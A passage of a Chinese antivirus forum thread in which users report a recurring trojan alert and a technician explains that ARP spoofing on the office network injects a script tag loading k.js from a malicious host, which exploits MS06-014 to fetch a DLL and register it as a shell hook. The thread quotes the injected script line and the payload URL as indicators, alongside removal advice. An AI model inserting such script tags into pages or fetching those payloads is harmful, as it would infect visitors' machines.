瑞星卡卡安全论坛技术交流区反病毒/反流氓软件论坛 病毒Trojan.DL.VBS.Agent.cpb(K[1].JS)重复出现,问题重要!技术员来看

123456   5  /  6  页   跳转

病毒Trojan.DL.VBS.Agent.cpb(K[1].JS)重复出现,问题重要!技术员来看

我们公司好多人都中了这个不知道是不是病毒的东西,打开网页,每个页面加载<script src="http://k.sb941.com/k.js" type="text/javascript"></script>,我用的windows2000也中了,整整搞了一天,杀毒,杀木马,重装系统都没用,只好在HOST表里把这个网站封了,还有几台XP系统也一样,晚上下班回家,第二天上班,莫名其妙就没了,其他电脑还是有这个病毒,本人用的不是瑞星,线路是电信,用IE和火狐浏览器都一样
gototop
 

我们单位也是这样,昨天发现这个东西有但过了不久又没有了,反复出现,今天一天都有
gototop
 

UP
gototop
 

本来想午睡的,看来这个情况是睡不了了。
该网页利用MS06-014漏洞,下载http://day.91tg.net/xp.dll到C:\WINDOWS\winhelp.dll,并直接写入注册表
HKLM\SOFTWARE\Classes\CLSID\{6B3FCDC8-E5C7-477a-817E-72865A7758AE}\
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\ShellExecuteHooks\{6B3FCDC8-E5C7-477a-817E-72865A7758AE}
指向C:\WINDOWS\winhelp.dll

由于瑞星查杀了k.js,一般情况下大家是不会中毒的。但是之所以重复出现k.js的报毒,原因是:
局域网中有电脑中了此毒,然后向局域网中其他电脑发动ARP攻击,将其他用户接收到的网络数据包中加入
<script src="http://k.sb941.com/k.js" type="text/javascript"></script>
的代码,导致其他用户访问任何网站时都会报毒。

所以,首先,确认你的电脑是否中毒:
确认以下注册表路径是否存在:
[HKLM\SOFTWARE\Classes\CLSID\{6B3FCDC8-E5C7-477a-817E-72865A7758AE}]
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\ShellExecuteHooks\{6B3FCDC8-E5C7-477a-817E-72865A7758AE}]
如果存在,尝试在安全模式下删除这两个注册表路径。

如果不存在,说明不是你本机的中毒问题,而是你受到ARP攻击的缘故。
这种情况下,请联系局域网网管进行协调处理。必须找到中毒并进行ARP欺骗的电脑,然后将其断网查毒。

对于客户端上网流程和“网页挂马”的几种方式分析可参考
http://hi.baidu.com/litiejun/blog/item/049d703d4f64ffef3c6d9738.html
其中所提到的:
攻击点:1.在客户端(网民)主机或网络中发送攻击代码,比如ARP攻击,插入恶意代码,诱使用户访问攻击者指定的站点,这时会影响该客户端或其所在的网络
正是本帖用户所面临的情况。

gototop
 

如果找出中毒电脑不太可能的情况下

那我们自己电脑如何防止ARP攻击?
有没有好的办法?

gototop
 

原来是ARP,难怪今天怎么那么安稳,原来,我把那台中了ARP病毒的机器搞定了,害的我昨天拼命的重装系统
gototop
 

上www.ewido.com上把anti.spywarem免费下载下来,用它杀最好!
gototop
 

我都杀掉了,这个工具很好,瑞星找不出病毒,但这个工具可以找出来,设置成delete,然后执行下面的按钮,就全变成done,就好了
gototop
 

UP
gototop
 

有没有好的办法防止ARP病毒的攻击??如在防火墙设置
gototop
 
123456   5  /  6  页   跳转
页面顶部
Powered by Discuz!NT